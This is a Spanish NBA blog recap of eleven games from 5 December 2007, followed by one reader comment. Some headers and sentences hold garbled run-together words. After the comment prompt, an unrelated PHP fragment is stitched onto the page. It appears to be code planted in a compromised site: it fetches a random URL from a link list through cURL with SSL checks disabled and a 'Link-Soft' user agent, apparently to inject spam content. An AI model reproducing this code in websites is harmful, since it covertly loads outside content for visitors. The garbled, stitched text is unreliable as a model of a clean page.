La crónica (5/12/07)

06 de December de 2007 por MagicJohnson32

 

11 partidos se jugaron ayer en la NBA, entre ellos un San Antonio – Dallas que huele a Finales de Conferencia en el Oeste si los Suns lo permiten. El partido de la jornada lo ganaron los Spurs a pesar de la ausencia de Duncan, lo que supone todo un golpe de autoridad. Tres equipos se fueron por encima de los 120 puntos y dos de ellos en el mismo partido sumando 259 puntos en total. Detroit venció sin muchos apuros a los Hornets, cosa que no todos pueden decir. Por su parte, Chicago hundió más a unos Bobcats que a principio de temporada sonaban para Playoffs, y los Lakers ganaron a pesar de los 51 puntos de Allen Iverson. Y a todo esto, T-Mac consiguió su primer triple doble desde que está en Houston. Muchas cosas pasaron ayer, todas las explicamos en la crónica:

Suns 136 – 123 Raptors

Cuando uno sale a jugarle a los Suns a hacer mucho puntos está corriendo un riesgo muy alto: que Phoenix tebarboraptors haga más. Por ejemplo, 136, como le pasó a Toronto anoche. Los canadienses encajaron 45 puntos en el tercer cuarto, cuando los Suns abrieron brecha para sumar su 15ª victoria de la campaña. Barbosa lideró el festival con 35 puntos en 34 minutos, Amare hizo 25 con 9 de 11 en tiros de campo y 7 de 7 en libres, y otros cinco jugadores anotaron en dobles figuras para los Suns, dirigidos por las 18 asistencias de Nash. Por los Raptors, que jugaron de nuevo sin Bosh, Ford aportó 27 puntos desde el banquillo, y Calderón siguió brillando como el base titular: 14 puntos y 9 asistencias. Anthony Parker logró además 22 puntos y tanto Delfino como Nesterovic lograron más de 10. Ambos equipos acertaron con más de un 55% de sus tiros y anotaron la espectacular cifra de 104 tiros de campo de los 182 que intentaron.

Celtics 113 – 103 Sixers

Uno ha de empezar a asumir la derrota desde casi antes de jugar ante los Celtics. Lo que costará asumir a los Sixers es que, tras uno de sus mejores actuaciones esta campaña, el partido se decidiese gracias a los triples de Eddie House y James Posey. Andre Miller firmó uno de sus mejores partidos como jugador de los Sixers, con 10 de 16 en tiros, 26 puntos, 12 asistencias y 5 rebotes. Iguodala también estuvo muy efectivo con 10 de 17 y 24 puntos. Dalembert hizo 13 con 5 de 6, más 9 rebotes. Louis Williams anotó 8 de sus 13 tiros. Pero Posey y House lograron 7 de 13 en triples, varios de ellos en los minutos decisivos, y equilibraron así el mal día de Ray Allen (3 de 12). Garnett y Pierce sí brillaron con 22 y 7 rebotes del primero y 19 con 12 asistencias del segundo.

Cavs 86 – 105 Wizards

Los Cavaliers siguen acumulando derrotas en ausencia de LeBron James mientras los Wizards sobreviven sin Arenas. Mucho tiene que ver en esto último el gran momento de Caronhughesjamesmarshall Butler, que anoche logró 27 puntos, 7 rebotes y 4 recuperaciones. Jamison y Haywood añadieron ambos 17 puntos y dobles figuras en rebotes, Daniels hizo 10 y 9 asistencias y Nick Young aportó 14 desde el banco. Por los Cavs, sin James, Hughes, Marshall y aún sin Varejao tras igualar la oferta de los Bobcats, sólo Ilgauskas y Gibson salvaron sus estadísticas, con 12 puntos-10 rebotes del pívot y 13 puntos-8 asistencias del base. El 13-31 del segundo cuarto decantó el partido para unos Wizards que vuelven a situar su balance al 50% (9-9).

Pistons 91 – 76 Hornets

No era a priori un partido fácil para Detroit pero gracias a una buena defensa y un buen acierto en el tiro en el segundo cuarto sacaron adelante su cuarto partido en 5 días. RIP Hamilton y Chauncey Billups comendaron a un equipo que se fue entonando con el paso de los minutos y que dejó a los Hornets en unos paupérrimos porcentajes de tiro. Desde el banquilo Jason Maxiell y Jarvis Hayes cumplieron a la perfección su papel dando unos valiosos minutos de descanso a los titulares. Por los Hornets destacó sobretodo Tyson Chandler, que al no encontrar mucha oposición en el juego interior de los Pistons se erigió en el rey indiscutible de la zona y acabó el partido con 17 puntos y 22 rebotes.

Bulls 91 – 82 Bobcats

Ayer todo fueron malas noticias para Bobcats. Primero los Cavs igualaron su oferta por Varejao; más tarde, su racha de derrotas aumentó a siete. Los de Charlotte no ganan desde el pasado 19 de noviembre; anoche cayeron ante los Bulls, que parecen recuperar la normalidad poco a poco y suman tres victorias en sus últimos cuatro partidos. No será gracias a Hinrich y Wallace, que anoche se quedaron sin anotar pese a ser titulares; Deng, con 30 puntos, y Nocioni, con 15 y 11 rebotes desde el banquillo, lideraron el quinto triunfo de los Bulls esta temporada. El mejor de los Bobcats, que caen ya a un balance de 6-11, fue Gerald Wallace, con 22 puntos y 8 rebotes.

kobeiversonLakers 111 – 107 Nuggets

Durante 36 minutos, Allen Iverson fue el dueño y señor del partido entre Nuggets y Lakers. El último cuarto, en cambio, perteneció a Kobe Bryant.. Los Lakers lograron en el Pepsi Center de Denver su segunda victoria en dos noches pese a los 51 puntos anotados por Iverson, 49 de ellos en los tres primeros cuartos. Los Lakers resistieron a la inspiración de Iverson, especialmente en un tercer cuarto en el que Bryant cometió su cuarta falta a los pocos segundos, algo que le llevó al banquillo hasta el inicio del último periodo. A partir de ese momento Iverson sólo pudo anotar dos puntos, mientras Bryant hizo 13, seis de ellos en los últimos 1:40 y con el macador empatado a 102 para dar el triunfo a los Lakers. Al margen de los 51 y 8 asistencias de Iverson, Carmelo anotó 26 y Camby atrapó 20 rebotes (sin un solo punto). Por los Lakers, Bryant, que hubo de ser atendido en el vestuario tras un fuerte golpe en el hombre y que, como Bynum, sufrió anteayer una gatroenteritis, finalizó con 25-8-5 en 30 minutos. Radmanovic y Fisher sumaron 21 y 20 respectivamente y, con este resultado, ambos equipos quedan ahora con idéntico balance: 11-8.

Knicks 100 – 93 Nets

Noche de ausencias. Los Knicks visitaban a sus vecinos de New Jersey sin dos de sus titulares, Marbury, por la muerte de su padre, y Curry, con un esguince de tobillo. Por su parte, los Nets presentaban las bajas de Krstic y Kidd. Y ante la ausencia de sus bases titulares, ganaron los Knicks que, lógicamente, echaron menos en falta anavarrockets Marbury que los Nets a Kidd. Gracias a un buen primer cuarto, en especial de Crawford y Randolph, ambos con 10 puntos, los Knicks consiguieron establecer los 8 puntos de ventaja que prácticamente se mantuvieron hasta el final. Los mejores del partido fueron Crawford, con 29 puntos y 7 asistencias, y Randolph, con 25 y 6 rebotes, para los ganadores, y de nuevo Jefferson, con 31 puntos, para los Nets.

Grizzlies 92 – 105 Rockets

Si tus tiros no entran, lo mejor es pasársela a quien sí está acertado. Eso hizo McGrady cuando después de 15 lanzamientos sólo llevaba 3 canastas. El resultado: T-Mac logró su tercer triple-doble en la NBA, el primero desde que llegó a Houston, y Yao y Bonzi Wells se pusieron las botas con un espectacular acumulado de 21 de 31 en tiros, 48 puntos y 20 rebotes. McGrady añadió sus 17-10-12 y Scola aportó 16 puntos en 17 minutos en un triunfo que sitúa a los texanos con un balance de 10-9. En los Grizzlies, Gasol brilló con 23 puntos y 12 rebotes, y el resto de titulares, incluyendo a Navarro, anotaron 10 o más puntos. Pero desde el banquillo apenas llegó contribución alguna, 9 puntos, 5 rebotes y 2 asistencias, cifras que contrastan con los 42 puntos aportados por el banquillo de los Rockets.

manudiopfoulMavs 95 – 97 Spurs

Golpe sobre la mesa el que dieron anoche los Spurs, que no pueden contar con Duncan por su lesión en la rodilla, con un triunfo ante los Mavs. En ausencia de su líder, Ginóbili tomó las riendas con 37 puntos, 4 rebotes, 6 asistencias y 2 robos. Parker añadió 23, Finley sumó 14 y Elson taponó a Jason Terry a falta de tres segundos para el final. Dirk Nowitzki, autor de 15 puntos y 9 rebotes, dispuso de un triple sobre la bocina pero erró. Josh Howard y Terry lograron 22 y 20 puntos respectivamente, y Bass añadió 18, pero la derrota se quedó en San Antonio y los Mavs se quedan cuatro partidos por detrás de los Spurs.

Bucks 90 – 120 Warriors

Y los Golden State Warriors se pusieron a correr. Y cuando GSW corre y, encima, tiene un gran acierto en el tiro muy pocos equipos, entre los que no están los Bucks, pueden hacerle sombra. Nada menos que 15 triples de 22 intentos, un 68% de acierto en el tiro exterior, complementado con 52% en tiros de 2 puntos y un 93% en libres… Tan clara fue la victoria que los titulares de los Warriors pudieron descansar de cara a choques venideros y por ejemplo Davis y Jackson anotaron 20 puntos en aproximadamente 30 minutos. Croshere, en apenas 12 minutos, también se unió a la fiesta y anotó 11 puntos con 3 de 4 en triples. Por parte de los Bucks tan solo Michael Redd jugó a su nivel habitual, aunque, seguramente desquiciado por el vendaval Warriors, acabó con pobres porcentajes en el tiro. Los 11 puntos que anotaron los Bucks en el segundo cuarto es la peor puntuación de la temporada en un solo cuarto empatados con… ellos mismos.

Comenta

Un comentario a esta entrada

  1. mirrorism dice:
    #1

    ¿Nada sobre la rumoreada huelga de Jason Kidd?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>